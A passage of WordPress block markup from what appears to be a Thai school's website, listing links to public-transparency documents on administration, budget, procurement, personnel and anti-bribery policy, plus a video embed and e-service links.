{\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://youtube.com/channel/UCJdt2kX8LXFGPgOX_y2j7GQ?si=eaP1U0RyYCHb_urQ\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:embed {\"url\":\"https://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\",\"type\":\"video\",\"providerNameSlug\":\"youtube\",\"responsive\":true,\"className\":\"wp-embed-aspect-16-9 wp-has-aspect-ratio\"} -->\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\nhttps://youtu.be/C9do6YkaRVU?si=Ez42jZHElNDgGtg3\n</div></figure>\n<!-- /wp:embed -->\n\n<!-- wp:image {\"id\":566,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://watprato.ssk.in.th/wp-content/uploads/2025/06/483858906_122214558428202781_582783627217107479_n-1-1024x726.jpg\" alt=\"\" class=\"wp-image-566\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"8a0e429c\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"large\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27-1024x576.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1vpEfIBbTNX95TmNJuW7IdN5nLwUBzkuN/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" 